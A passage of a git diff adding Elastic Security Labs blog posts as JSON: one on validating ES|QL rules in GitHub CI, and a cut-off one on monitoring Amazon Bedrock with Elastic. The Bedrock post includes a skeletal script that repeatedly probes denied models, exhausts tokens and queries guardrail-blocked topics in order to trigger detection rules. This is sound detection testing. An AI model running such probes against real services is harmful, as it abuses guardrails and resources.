+ "title": "Storm on the Horizon: Inside the AJCloud IoT Ecosystem",
+ "slug": "storm-on-the-horizon",
+ "date": "2024-09-20",
+ "description": "Wi-Fi cameras are popular due to their affordability and convenience but often have security vulnerabilities that can be exploited.",
+ "author": [
+ {
+ "slug": "mark-mager"
+ },
+ {
+ "slug": "eric-forte"
+ }
+ ],
+ "image": "storm-on-the-horizon.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "perspectives"
+ }
+ ],
+ "tags": [
+ "iot",
+ "defcon"
+ ]
+ },
+ "id": "security_labs_content-storm_on_the_horizon-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-streamlining_esql_query_and_rule_validation-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-streamlining_esql_query_and_rule_validation-md.json
new file mode 100644
index 00000000000..c97ff806068
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-streamlining_esql_query_and_rule_validation-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Streamlining ES|QL Query and Rule Validation: Integrating with GitHub CI\"\nslug: \"streamlining-esql-query-and-rule-validation\"\ndate: \"2023-11-17\"\ndescription: \"ES|QL is Elastic's new piped query language. Taking full advantage of this new feature, Elastic Security Labs walks through how to run validation of ES|QL rules for the Detection Engine.\"\nauthor:\n - slug: mika-ayenson\n - slug: eric-forte\nimage: \"photo-edited-01.png\"\ncategory:\n - slug: security-research\n---\n\nOne of the amazing, recently premiered [8.11.0 features](https://www.elastic.co/guide/en/elasticsearch/reference/current/release-highlights.html), is the Elasticsearch Query Language ([ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql.html)). As highlighted in an earlier [post by Costin Leau](https://www.elastic.co/blog/elasticsearch-query-language-esql), it’s a full-blown, specialized query and compute engine for Elasitcsearch. Now that it’s in technical preview, we wanted to share some options to _validate_ your ES|QL queries. This overview is for engineers new to ES|QL. Whether you’re searching for insights in Kibana or investigating security threats in [Timelines](https://www.elastic.co/guide/en/security/current/timelines-ui.html), you’ll see how this capability is seamlessly interwoven throughout Elastic. \n\n## ES|QL validation basics ft. Kibana & Elasticsearch\n\nIf you want to quickly validate a single query, or feel comfortable manually testing queries one-by-one, the Elastic Stack UI is all you need. After navigating to the Discover tab in Kibana, click on the \"**Try ES|QL**\" Technical Preview button in the Data View dropdown to load the query pane. You can also grab sample queries from the [ES|QL Examples](https://www.elastic.co/guide/en/elasticsearch/reference/master/esql-examples.html) to get up and running. Introducing non-[ECS](https://www.elastic.co/guide/en/ecs/current/index.html) fields will immediately highlight errors prioritizing syntax errors, then unknown column errors. \n\n\n\nIn this example, there are two syntax errors that are highlighted: \n* the invalid syntax error on the input `wheres` which should be `where` and \n* the unknown column `process.worsking_directory`, which should be `process.working_directory`. \n\n\n\nAfter resolving the syntax error in this example, you’ll observe the Unknown column errors. Here are a couple reasons this error may appear: \n\n - **Fix Field Name Typos**: Sometimes you simply need to fix the name as suggested in the error; consult the ECS or any integration schemas and confirm the fields are correct\n - **Add Missing Data**: If you’re confident the fields are correct, sometimes adding data to your stack, which will populate the columns\n - **Update Mapping**: You can configure [Mappings](https://www.elastic.co/guide/en/elasticsearch/reference/8.11/mapping.html) to set explicit fields, or add new fields to an existing data stream or index using the [Update Mapping API](https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-put-mapping.html) \n\n## ES|QL warnings\n\nNot all fields will appear as errors, in which case you’re presented with warnings and a dropdown list. Hard failures (e.g. errors), imply that the rule cannot execute, whereas warnings indicate that the rule can run, but the functions may be degraded. \n\n\n\nWhen utilizing broad ES|QL queries that span multiple indices, such as `logs-* | limit 10`, there might be instances where certain fields fail to appear in the results. This is often due to the fields being undefined in the indexed data, or not yet supported by ES|QL. In cases where the expected fields are not retrieved, it's typically a sign that the data was ingested into Elasticsearch without these fields being indexed, as per the established mappings. Instead of causing the query to fail, ES|QL handles this by returning \"null\" for the unavailable fields, serving as a warning that something in the query did not execute as expected. This approach ensures the query still runs, distinguishing it from a hard failure, which occurs when the query cannot execute at all, such as when a non-existent field is referenced. \n\n\n\nThere are also helpful performance warnings that may appear. Providing a `LIMIT` parameter to the query will help address performance warnings. Note this example highlights that there is a default limit of 500 events returned. This limit may significantly increase once this feature is generally available. \n\n## Security \n\nIn an investigative workflow, security practitioners prefer to iteratively hunt for threats, which may encompass manually testing, refining, and tuning a query in the UI. Conveniently, security analysts and engineers can natively leverage ES|QL in timelines, with no need to interrupt workflows by pivoting back and forth to a different view in Kibana. You’ll receive the same errors and warnings in the same security component, which shows Elasticsearch feedback under the hood.\n\n\n\nIn some components, you will receive additional feedback based on the context of where ES|QL is implemented. One scenario is when you create an ES|QL rule using the create new rule feature under the Detection Rules (SIEM) tab.\n\n\n\nFor example, this query could easily be converted to an [EQL](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql.html) or [KQL](https://www.elastic.co/guide/en/kibana/current/kuery-query.html) query as it does not leverage powerful features of ES|QL like statistics, frequency analysis, or parsing unstructured data. If you want to learn more about the benefits of queries using ES|QL check out this [blog by Costin](https://www.elastic.co/blog/elasticsearch-query-language-esql), which covers performance boosts. In this case, we must add `metadata _id, _version, _index` to the query, which informs the UI which components to return in the results.\n\n## API calls? Of course!\n\nPrior to this section, all of the examples referenced creating ES|QL queries and receiving feedback directly from the UI. For illustrative purposes, the following examples leverage Dev Tools, but these calls are easily migratable to cURL bash commands or the language / tool of your choice that can send an HTTP request.\n\n\n\nHere is the same query as previously shown throughout other examples, sent via a POST request to the [query API](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-query-api.html) with a valid query. \n\n\n\nAs expected, if you supply an invalid query, you’ll receive similar feedback observed in the UI. In this example, we’ve also supplied the `?error_trace` flag which can provide the stack trace if you need additional context for why the query failed validation. \n\nAs you can imagine, we can use the API to programmatically validate ES|QL queries. You can also still use the [Create rule](https://www.elastic.co/guide/en/kibana/current/create-rule-api.html) Kibana API, which requires a bit more metadata associated with a security rule. However, if you want to only validate a query, the `_query` API comes in handy. From here you can use the [Elasticsearch Python Client](https://www.elastic.co/guide/en/elasticsearch/client/python-api/current/index.html) to connect to your stack and validate queries.\n\n```\nfrom elasticsearch import Elasticsearch\nclient = Elasticsearch(...)\ndata = {\n\"query\": \"\"\"\n from logs-endpoint.events.*\n | keep host.os.type, process.name, process.working_directory, event.type, event.action\n | where host.os.type == \"linux\" and process.name == \"unshadow\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\")\n\"\"\"\n}\n\n# Execute the query\nheaders = {\"Content-Type\": \"application/json\", \"Accept\": \"application/json\"}\nresponse = client.perform_request(\n\"POST\", \"/_query\", params={\"pretty\": True}, headers=headers, body=data\n)\n```\n\n## Leverage the grammar\n\nOne of the best parts of Elastic developing in the open is the [antlr ES|QL grammar](https://github.com/elastic/elasticsearch/tree/main/x-pack/plugin/esql/src/main/antlr) is also available. \n\n\n\nIf you’re comfortable with [ANTLR](https://www.antlr.org), you can also download the latest JAR to build a lexer and parser.\n\n```\npip install antlr4-tools # for antlr4\ngit clone git@github.com:elastic/elasticsearch.git # large repo\ncd elasticsearch/x-pack/plugin/esql/src/main/antlr # navigate to grammar\nantlr4 -Dlanguage=Python3 -o build EsqlBaseLexer.g4 # generate lexer\nantlr4 -Dlanguage=Python3 -o build EsqlBaseParser.g4 # generate parser\n```\n\nThis process will require more lifting to get ES|QL validation started, but you’ll at least have a tree object built, that provides more granular control and access to the parsed fields.\n\n\n\nHowever, as you can see the listeners are stubs, which means you’ll need to build in semantics _manually_ if you want to go this route.\n\n## The security rule GitHub CI use case\n\nFor our internal Elastic EQL and KQL query rule validation, we utilize the parsed abstract syntax tree (AST) objects of our queries to perform nuanced semantic validation across multiple stack versions. For example, having the AST allows us to validate proper field usage, verify new features are not used in older stack versions before being introduced, or even more, ensure related integrations are built based on datastreams used in the query. Fundamentally, local validation allows us to streamline a broader range of support for many stack features and versions. If you’re interested in seeing more of the design and rigorous validation that we can do with the AST, check out our [detection-rules repo](https://github.com/elastic/detection-rules/tree/main).\n \nIf you do not need granular access to the specific parsed tree objects and do not need to control the semantics of ES|QL validation, then out-of-the-box APIs may be all you need to validate queries. In this use case, we want to validate security detection rules using continuous integration. Managing detection rules through systems like GitHub helps garner all the benefits of using a version-controlled like tracking rule changes, receiving feedback via pull requests, and more. Conceptually, rule authors should be able to create these rules (which contain ES|QL queries) locally and exercise the git rule development lifecycle. \n\nCI checks help to ensure queries still pass ES|QL validation without having to manually check the query in the UI. Based on the examples shown thus far, you have to either stand up a persistent stack and validate queries against the API, or build a parser implementation based on the available grammar outside of the Elastic stack. \n\nOne approach to using a short-lived Elastic stack versus leveraging a managed persistent stack is to use the [Elastic Container Project (ECP)](https://github.com/peasead/elastic-container). As advertised, this project will: \n\n_Stand up a 100% containerized Elastic stack, TLS secured, with Elasticsearch, Kibana, Fleet, and the Detection Engine all pre-configured, enabled, and ready to use, within minutes._\n\n\n\nWith a combination of: \n\n - Elastic Containers (e.g. ECP)\n - CI (e.g. Github Action Workflow)\n - ES|QL rules\n - Automation Foo (e.g. python & bash scripts)\n\nYou can validate ES|QL rules via CI against the _latest stack version_ relatively easily, but there are some nuances involved in this approach.\n\n\n\nFeel free to check out the sample [GitHub action workflow](https://gist.github.com/Mikaayenson/7fa8f908ab7e8466178679a9a0cd9ecc) if you’re interested in a high-level overview of how it can be implemented.\n\n**Note:** if you're interested in using the GitHub action workflow, check out their documentation on using GitHub [secrets in Actions](https://docs.github.com/en/actions/security-guides/using-secrets-in-github-actions) and [setting up Action workflows](https://docs.github.com/en/actions/quickstart).\n\n## CI nuances\n\n 1. Any custom configuration needs to be scripted away (e.g. setting up additional policies, [enrichments](https://www.elastic.co/guide/en/elasticsearch/reference/current/match-enrich-policy-type.html), etc.) In our POC, we created a step and bash script that executed a series of POST requests to our temporary CI Elastic Stack, which created the new enrichments used in our detection rules.\n\n```\n- name: Add Enrich Policy\n env:\n ELASTICSEARCH_SERVER: \"https://localhost:9200\"\n ELASTICSEARCH_USERNAME: \"elastic\"\n ELASTICSEARCH_PASSWORD: \"${{ secrets.PASSWORD }}\"\n run: |\n set -x\n chmod +x ./add_enrich.sh\n bash ./add_enrich.sh\n```\n\n 2. Without data in our freshly deployed CI Elastic stack, there will be many `Unknown Column` issues as previously mentioned. One approach to address this is to build indices with the proper mappings for the queries to match. For example, if you have a query that searches the index `logs-endpoint.events.*`, then create an index called `logs-endpoint.events.ci`, with the proper mappings from the integration used in the query. \n \n 3. Once the temporary stack is configured, you’ll need extra logic to iterate over all the rules and validate using the `_query` API. For example, you can create a unit test that iterates over all the rules. We do this today by leveraging our default `RuleCollection.default()` that loads all rules, in our detection-rules repo, but here is a snippet that quickly loads only ES|QL rules.\n \n\n```\n# tests/test_all_rules.py\nclass TestESQLRules:\n \"\"\"Test ESQL Rules.\"\"\"\n\n @unittest.skipIf(not os.environ.get(\"DR_VALIDATE_ESQL\"),\n \"Test only run when DR_VALIDATE_ESQL environment variable set.\")\n def test_environment_variables_set(self):\n collection = RuleCollection()\n\n # Iterate over all .toml files in the given directory recursively\n for rule in Path(DEFAULT_RULES_DIR).rglob('*.toml'):\n # Read file content\n content = rule.read_text(encoding='utf-8')\n # Search for the pattern\n if re.search(r'language = \"esql\"', content):\n print(f\"Validating {str(rule)}\")\n collection.load_file(rule)\n```\n\n Each rule would run through a validator method once the file is loaded with `load_file`. \n\n```\n# detection_rules/rule_validator.py\nclass ESQLValidator(QueryValidator):\n \"\"\"Specific fields for ESQL query event types.\"\"\"\n\n def validate(self, data: 'QueryRuleData', meta: RuleMeta) -> None:\n \"\"\"Validate an ESQL query while checking TOMLRule.\"\"\"\n if not os.environ.get(\"DR_VALIDATE_ESQL\"):\n return\n\n if Version.parse(meta.min_stack_version) < Version.parse(\"8.11.0\"):\n raise ValidationError(f\"Rule minstack must be greater than 8.10.0 {data.rule_id}\")\n\n client = Elasticsearch(...)\n client.info()\n client.perform_request(\"POST\", \"/_query\", params={\"pretty\": True},\n headers={\"accept\": \"application/json\", \n \"content-type\": \"application/json\"},\n body={\"query\": f\"{self.query} | LIMIT 0\"})\n```\n\n As highlighted earlier, we can `POST` to the query API and validate given the credentials that were set as GitHub action secrets and passed to the validation as environment variables. Note, the `LIMIT 0` is so the query does not return data intentionally. It’s meant to only perform validation. Finally the single CI step would be a bash call to run the unit tests (e.g. `pytest tests/test_all_rules.py::TestESQLRules`). \n\n 4. Finally, CI leveraging containers may not scale well when validating many rules against multiple Elastic stack versions and configurations. Especially if you would like to test on a commit-basis. The time to deploy one stack took slightly over five minutes to complete. This measurement could greatly increase or decrease depending on your CI setup. \n \n## Conclusion\n\nElasticsearch's new feature, Elasticsearch Query Language (ES|QL), is a specialized query and compute engine for Elasticsearch, now in technical preview. It offers seamless integration across various Elastic services like Kibana and Timelines, with validation options for ES|QL queries. Users can validate queries through the Elastic Stack UI or API calls, receiving immediate feedback on syntax or column errors. \n\nAdditionally, ES|QL's ANTLR grammar is [available](https://github.com/elastic/elasticsearch/tree/d5f5d0908ff7d1bfb3978e4c57aa6ff517f6ed29/x-pack/plugin/esql/src/main/antlr) for those who prefer a more hands-on approach to building lexers and parsers. We’re exploring ways to validate ES|QL queries in an automated fashion and now it’s your turn. Just know that we’re not done exploring, so check out ES|QL and let us know if you have ideas! We’d love to hear how you plan to use it within the stack natively or in CI.\n\nWe’re always interested in hearing use cases and workflows like these, so as always, reach out to us via [GitHub issues](https://github.com/elastic/detection-rules/issues), chat with us in our [community Slack](http://ela.st/slack), and ask questions in our [Discuss forums](https://discuss.elastic.co/c/security/endpoint-security/80).\n\nCheck out these additional resources to learn more about how we’re bringing the latest AI capabilities to the hands of the analyst:\nLearn everything [ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql.html) \nCheckout the 8.11.0 release blog [introducing ES|QL](https://www.elastic.co/blog/whats-new-elasticsearch-platform-8-11-0)\n"
+ },
+ "title": "Streamlining ES|QL Query and Rule Validation: Integrating with GitHub CI",
+ "slug": "streamlining-esql-query-and-rule-validation",
+ "date": "2023-11-17",
+ "description": "ES|QL is Elastic's new piped query language. Taking full advantage of this new feature, Elastic Security Labs walks through how to run validation of ES|QL rules for the Detection Engine.",
+ "author": [
+ {
+ "slug": "mika-ayenson"
+ },
+ {
+ "slug": "eric-forte"
+ }
+ ],
+ "image": "photo-edited-01.png",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-streamlining_esql_query_and_rule_validation-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-streamlining_security_integrating_amazon_bedrock-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-streamlining_security_integrating_amazon_bedrock-md.json
new file mode 100644
index 00000000000..637ec25ceae
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-streamlining_security_integrating_amazon_bedrock-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Streamlining Security: Integrating Amazon Bedrock with Elastic\"\nslug: \"streamlining-security-integrating-amazon-bedrock\"\ndate: \"2024-11-14\"\ndescription: \"This article will guide you through the process of setting up the Amazon Bedrock integration and enabling Elastic's prebuilt detection rules to streamline your security operations.\"\nauthor:\n - slug: shashank-k-s\nimage: \"Security Labs Images 36.jpg\"\ncategory:\n - slug: security-research\n---\n\n# Preamble\n\nIn the ever-evolving landscape of cloud computing, maintaining robust security while ensuring compliance is a critical challenge for organizations of all sizes. As businesses increasingly adopt the cloud, the complexity of managing and securing data across various platforms grows exponentially. \n\n[Amazon Bedrock](https://docs.aws.amazon.com/bedrock/latest/userguide/what-is-bedrock.html), with its powerful foundation of machine learning and AI services, offers a scalable, secure environment for organizations to develop and deploy intelligent applications. However, to fully harness the potential of these innovations, it’s essential to implement a streamlined approach to security and compliance.\n\nIntegrating Elastic with Amazon Bedrock can significantly enhance security monitoring and compliance management within your cloud environment. This integration leverages Elastic’s search, observability, and security capabilities to optimize how you manage and secure applications and data hosted on Amazon Bedrock. \n\t \nElastic’s [security information and event management (SIEM) capabilities](https://www.elastic.co/security/siem) can be used to analyze logs and monitor events generated by applications running on Amazon Bedrock. This allows for the detection of potential security threats in real-time and automated response actions to mitigate risks.\n\nThis article will guide you through the process of setting up Amazon Bedrock integration and enabling our prebuilt detection rules to streamline your security operations. We will cover the following key aspects:\n\n 1. **Prerequisites for Elastic Amazon Bedrock Integration:** Understanding the core requirements for setting up Elastic Amazon Bedrock integration for cloud security. \n 2. **Setting Up Amazon Bedrock Integration**: Step-by-step instructions to set up Amazon Bedrock in your existing AWS infrastructure. \n 3. **Enabling Prebuilt Security Rules**: How to leverage [prebuilt rules](https://www.elastic.co/guide/en/security/current/rules-ui-management.html) to detect high-confidence policy violations and other security threats. \n 4. **Exploring High-Confidence Misconduct Blocks Detection:** An in-depth look at a specific prebuilt rule designed to detect high-confidence misconduct blocks within Amazon Bedrocklogs. \n 5. **Demonstrate an Exploit Case Scenario for Amazon Bedrock:** Using a sample python script to simulate interactions with an Amazon Bedrock model for testing exploit scenarios that could trigger Elastic prebuilt detection rules.\n\n# Prerequisites for Elastic Amazon Bedrock Integration\n\n## Elastic Integration for Amazon Bedrock\n\nThe Amazon Bedrock integration collects Amazon Bedrock model invocation logs and runtime metrics with Elastic Agent. For a deeper dive on the integration, documentation can be found in our [documentation.](https://www.elastic.co/docs/current/integrations/aws_bedrock)\n\nBelow are the list of prerequisites to have a complete and successful configuration of Amazon Bedrock Elastic Integration:\n\n * AWS Account Setup \n * Elastic Cloud Requirements \n * Terraform (Optional)\n\n### AWS Account Setup\n\n * **Active AWS Account**: Ensure you have an active AWS account with the appropriate permissions to deploy and manage resources on Amazon Bedrock. \n * **Amazon Bedrock Setup**: Confirm that Amazon Bedrock is correctly configured and operational within your AWS environment. This includes setting up AI models, datasets, and other resources necessary for your applications. Refer to [Getting started with Amazon Bedrock](https://docs.aws.amazon.com/bedrock/latest/userguide/getting-started.html) for additional information on the setup. \n * **IAM Roles and Permissions**: Create or configure Identity and Access Management (IAM) roles with the necessary permissions to allow Elastic to access Amazon Bedrock resources. These roles should have sufficient privileges to read logs, metrics, and traces from AWS services. Additional details of the requirements can be found in our [AWS documentation](https://www.elastic.co/docs/current/integrations/aws#requirements). \n\n### Elastic Cloud Requirements\n\n| [Version](https://www.elastic.co/docs/current/integrations/aws_bedrock#changelog) | 0.7.0 (Beta) |\n| :---- | :---- |\n| **Compatible Kibana version(s)** | 8.13.0 or higher for integration version 0.2.0 and above. Minimum Kibana Version 8.12.0 |\n| [**Supported Serverless project types**](https://www.elastic.co/docs/current/integrations/serverless/support) | Security Observability |\n| [**Subscription level**](https://www.elastic.co/subscriptions) | Basic |\n| [**Level of support**](https://www.elastic.co/docs/current/integrations/support) | Elastic |\n\n**Note:** Since the integration is in Beta Release Stage, please enable ***Display Beta Integrations in the browse integration section of the Management pane in your Elastic stack.***\n\n\n\n### Terraform\n\n[Terraform](https://www.terraform.io/) is an open source infrastructure-as-code (IaC) tool created by HashiCorp that allows you to define, provision, and manage cloud and on-premises infrastructure in a consistent and repeatable way. \n\t \nThis is an optional step, but good to have as the next sections of the article we use this tool to set up the required AWS Infrastructure. Deep dive on installation and docs can be found [here](https://developer.hashicorp.com/terraform/tutorials/aws-get-started/install-cli).\n\n# Setting Up Amazon Bedrock Integration\n\nIn this section of the article, we will walk through the steps to set up Amazon Bedrock integration with Elastic in two parts: \n\n 1. **Setting Up AWS Infrastructure with Terraform**: In this section, we'll walk through the steps to set up an AWS infrastructure using Terraform. We'll create an S3 bucket, an EC2 instance with the necessary IAM roles and policies to access the S3 bucket, and configure security groups to allow SSH access. This setup is ideal for scenarios where you need an EC2 instance to interact with S3, such as for data processing or storage. \n 2. **Elastic Agent and Integration Setup**: In this section, we'll walk through the steps to install Elastic Agent on the AWS EC2 instance and Configure the Amazon Bedrock Integration. \n\n### Setting Up AWS Infrastructure with Terraform\n\nThe high-level configuration process will involve the following steps:\n\n 1. Configuring ```providers.tf``` \n 2. Configuring ```variables.tf``` \n 3. Configuring ```outputs.tf``` \n 4. Configuring ```main.tf```\n\nThe ```providers.tf``` file typically contains the configuration for any Terraform providers you are using in your project. In our example, it includes the configuration for the AWS provider. Here is the [sample content](https://gist.github.com/shashank-elastic/290218cd4e787f65fbcbfd6423a0ca85#file-providers-tf) of our ```providers.tf``` file. The ```profile``` mentioned in the ```providers.tf``` should be configured in the user’s space of the AWS credentials file ```(~/.aws/credentials)```. Refer to [Configuration and credential file settings \\- AWS Command Line Interface](https://docs.aws.amazon.com/cli/v1/userguide/cli-configure-files.html#cli-configure-files-format-profile), which is also highlighted in the credential section of Elastic’s [AWS documentation](https://www.elastic.co/docs/current/integrations/aws#aws-credentials).\n\nThe ```variables.tf``` file contains the variable definitions used throughout your Terraform configuration. For our scenario, it includes the definition for the aws\\_region and resource\\_labels. Here is the [sample content](https://gist.github.com/shashank-elastic/290218cd4e787f65fbcbfd6423a0ca85#file-variables-tf) of our ```variables.tf``` file.\n\nThe ```outputs.tf``` file typically contains the output definitions for your Terraform configuration. These outputs can be used to display useful information after your infrastructure is provisioned. Here is the [sample content](https://gist.github.com/shashank-elastic/290218cd4e787f65fbcbfd6423a0ca85#file-outputs-tf) of our ```outputs.tf``` file\n\nThe ```main.tf``` file typically contains the collection of all of these resources such as data sources, S3 bucket and bucket policy, Amazon Bedrock Model Invocation Log configuration, SQS Queue configuration, IAM Role and Policies required by the EC2 instance that would install Elastic Agent and stream logs and Amazon Bedrock Guardrail configuration. Here is the [sample content](https://gist.github.com/shashank-elastic/290218cd4e787f65fbcbfd6423a0ca85#file-main-tf) of our ```main.tf``` file.\n\nOnce the ```main.tf``` is configured according to the requirements we can then initialize, plan and apply the terraform configuration.\n\n```\nterraform init // initializes the directory and sets up state files in backend\nterraform plan // command creates an execution plan\nterraform apply // command applies the configuration aka execution step\n```\n\nTo tear down the infrastructure that terraform has previously created one can use the ```terraform destroy``` command.\n\nOnce the infrastructure setup is completed, necessary resource identifiers are provided via ```outputs.tf.``` We can conduct a basic verification of the infrastructure created using the following steps: \n\n 1. Verify the S3 Bucket created from the Terraform, one can either use aws cli command reference [list-buckets — AWS CLI 1.34.10 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/s3api/list-buckets.html) or navigate via AWS console to verify the same. 2. Verify the SQS Queue created from the terraform, one can either use aws cli command reference [list-queues — AWS CLI 1.34.10 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sqs/list-queues.html) or navigate via AWS console to verify the same. \n 3. Verify the EC2 Instance created from the AWS console and connect to the ec2-instance via [Connect using EC2 Instance Connect \\- Amazon Elastic Compute Cloud](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-connect-methods.html#ec2-instance-connect-connecting-console) and run ```aws s3 ls example-bucket-name``` to check if the instance has access to the created S3 bucket. \n 4. Verify the Amazon Bedrock Guardrail created from the Terraform, once can either use Amazon Bedrock API [ListGuardrails \\- Amazon Bedrock](https://docs.aws.amazon.com/bedrock/latest/APIReference/API_ListGuardrails.html) or navigate via AWS console to verify the same.\n\n### Setting Up Elastic Agent and Integration Setup\n\nTo install Elastic Agent on the AWS EC2 instance and configure the Amazon Bedrock integration, create an agent policy using the guided steps in [Elastic Agent policies | Fleet and Elastic Agent Guide \\[8.15\\]](https://www.elastic.co/guide/en/fleet/current/agent-policy.html). Then log into to the ec2-instance created in the infrastructure setup steps via [Connect using EC2 Instance Connect \\- Amazon Elastic Compute Cloud](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-connect-methods.html#ec2-instance-connect-connecting-console), and install the elastic agent using the guided steps in [Install Elastic Agents | Fleet and Elastic Agent Guide \\[8.15\\]](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). During the agent installation, remember to select the agent policy created at the beginning of this setup process and use the relevant agent installation method depending on the instance created. Finally, ensure the agent is properly configured and there is incoming data from the agent.\n\nTo configure the Amazon Bedrock integration in the newly-created policy, add the Amazon Bedrock integration using the guided steps: [Add an Elastic Agent integration to a policy](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html). Enable Beta Integrations to use Amazon Bedrock integration as displayed in the image below. \n\n\n\nConfigure the Integration with AWS Access Keys to access the AWS account where Amazon Bedrock is configured. Use the Collect Logs from S3 bucket and specify the Bucket ARN created in the setup step. Please note to use either the S3 Bucket or the SQS Queue URL during the setup and *not both*. Add this integration to the existing policy where the ec2-instance is configured. \n\n\n\n### Verify Amazon Bedrock Model Invocation Log Ingestions\n\nOnce the Elastic Agent and integration setup is completed, we can conduct a basic verification of the integration to determine if the logs are being ingested as expected by using the following example API call: \n\n```\naws bedrock-runtime converse \\\n--model-id \"anthropic.claude-3-5-sonnet-20240620-v1:0\" \\\n--messages '[{\"role\":\"user\",\"content\":[{\"text\":\"Hello \"}]}]' \\\n--inference-config '{\"maxTokens\":2000,\"stopSequences\":[],\"temperature\":1,\"topP\":0.999}' \\\n--additional-model-request-fields '{\"top_k\":250}' \\\n--region us-east-1\n```\n\nThe example API call assumes a working setup with aws cli and there is access for the foundational model [Anthropic Claude Messages API \\- Amazon Bedrock](https://docs.aws.amazon.com/bedrock/latest/userguide/model-parameters-anthropic-claude-messages.html). If the user does not have access to the model one can simply request access for models from the model-access page as suggested in [Access Amazon Bedrock foundation models](https://docs.aws.amazon.com/bedrock/latest/userguide/model-access.html), or we can optionally change the API call to any existing model the user can access. \n\nOn successful execution of the above API call, the Amazon Bedrock Model invocation logs are populated and in Kibana ```logs-aws_bedrock.invocation-default``` should be populated with those invocation logs. We can use the following simple ES|QL query to return recently ingested events.\n\n```\nfrom logs-aws_bedrock.invocation-* | LIMIT 10\n```\n\n# Enable Prebuilt Detection Rules\n\nTo enable prebuilt detection rules, first login to the elastic instance and from the left pane navigation navigate to Security → Rules → Detection rules (SIEM). Filter for “Data Source: Amazon Bedrock” from the tags section. \n\nEnable the available prebuilt rules. For prebuilt rules, the Setup information contains a helper guide to setup AWS Guardrails for Amazon Bedrock, which is accomplished in the [Setting Up AWS Infrastructure with Terraform](?tab=t.0#bookmark=id.5wbf10usmxhz) step if the example is followed correctly and the terraform has the Amazon Bedrock Guardrail configuration. Please note this setup is vital for some of the rules to generate alerts–we need to ensure the guardrail is set up accordingly if skipped in the infrastructure setup stage.\n\n\n\n# Exploring High-Confidence Misconduct Blocks Detection\n\nLet’s simulate a real world scenario in which a user queries a topic denied to the Amazon Bedrock model. Navigate to the Amazon Bedrock section in the Amazon UI Console, and use the left navigation pane to navigate to the Guardrails subsection under Safeguards. Use the sample guardrail created during our setup instructions for this exercise, and use the test option to run a model invocation with the guardrails and query the denied topic configured.\n\n\n\nRepeat the query at least 6 times as the prebuilt rule is designed to alert on greater than 5 high confidence blocks. When the Alert schedule runs, we can see an alert populate for ```Unusual High Confidence Misconduct Blocks Detected.```\n\n\n\n# Demonstrate an Exploit Case Scenario for Amazon Bedrock\n\nTo simulate an Amazon Bedrock Security bypass, we need an exploit simulation script to interact with Amazon Bedrock models. The exploit script example we provide simulates the following attack pattern: \n\n * Attempts multiple successive requests to use denied model resources within AWS Bedrock \n * Generates multiple successive validation exception errors within Amazon Bedrock \n * User consistently generates high input token counts, submits numerous requests, and receives large responses that mimic patterns of resource exhaustion \n * Combines repeated high-confidence 'BLOCKED' actions coupled with specific violation codes such as 'MISCONDUCT', indicating persistent misuse or attempts to probe the model's ethical boundaries\n\n```py\nclass BedrockModelSimulator:\n def __init__(self, profile_name, region_name):\n // Create a Boto3 Session Client for Ineration \n def generate_args_invoke_model(self, model_id, user_message, tokens): \t// Generate Model Invocation parameters\n guardrail_id = <>\n guardrail_version = <>\n\n guardrail_config = {\n \"guardrailIdentifier\": guardrail_id,\n \"guardrailVersion\": guardrail_version,\n \"trace\": \"enabled\"\n }\n conversation = [\n {\n \"role\": \"user\",\n \"content\": [{\"text\": user_message}],\n }\n ]\n inference_config = {\"maxTokens\": tokens, \"temperature\": 0.7, \"topP\": 1}\n additional_model_request_fields = {}\n\n kwargs = {\n \"modelId\": model_id,\n \"messages\": conversation,\n \"inferenceConfig\": inference_config,\n \"additionalModelRequestFields\": additional_model_request_fields\n\t \"guardrailConfig\" : guardrail_config\n }\n return kwargs\n \n def invoke_model(self, invocation_arguments):\n for _ in range(count):\n try:\n // Invoke Model With right invocation_arguments\n except ClientError as e:\n // Error meesage\n\ndef main():\n profile_name = <>\n region_name = 'us-east-1'\n denied_model_id = // Use a denied model \n denied_model_user_message = // Sample Message \n available_model_id = // Use an available model \n validation_exception_user_message = // Sample Message \n resource_exploit_user_message = // A very big message for resource exhuastion\n denied_topic_user_message = // Sample Message that can query denied topic configured\n simulator = BedrockModelSimulator(profile_name, region_name)\n denied_model_invocation_arguments = simulator.generate_args_invoke_model(denied_model_id, denied_model_user_message, 200)\n simulator.invoke_model(denied_model_invocation_arguments)\n validation_exception_invocation_arguments = simulator.generate_args_invoke_model(available_model_id, validation_exception_user_message, 6000)\n simulator.invoke_model(validation_exception_invocation_arguments)\n resource_exhaustion_invocation_arguments = simulator.generate_args_invoke_available_model(available_model_id, resource_exploit_user_message, 4096)\n simulator.invoke_model(resource_exhaustion_invocation_arguments)\n denied_topic_invocation_arguments = simulator.generate_args_invoke_available_model_guardrail(available_model_id, denied_topic_user_message, 4096)\n simulator.invoke_model(denied_topic_invocation_arguments)\n\nif __name__ == \"__main__\":\n main()\n```\n\n**Note:** The GUARDRAIL\\_ID and GUARDRAIL\\_VERSION can be found in ```outputs.tf``` \n\nWhen executed in a controlled environment, the provided script simulates an exploit scenario 